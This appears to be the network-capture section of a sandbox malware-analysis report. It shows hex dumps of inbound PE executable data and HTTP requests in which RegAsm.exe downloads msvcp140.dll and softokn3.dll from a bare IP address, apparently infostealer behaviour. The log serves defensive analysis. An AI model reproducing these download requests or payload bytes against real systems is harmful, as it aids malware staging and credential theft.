2024-09-21 16:51:47 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-21 16:51:47 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-21 16:51:47 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-21 16:51:47 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-21 16:51:48 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-21 16:51:48 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-21 16:51:48 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-21 16:51:48 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-21 16:51:48 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-21 16:51:48 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:49 UTC	200	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:49 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:49 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:49 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 16:51:49 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-21 16:51:49 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:50 UTC	200	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:51 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:50 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:50 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
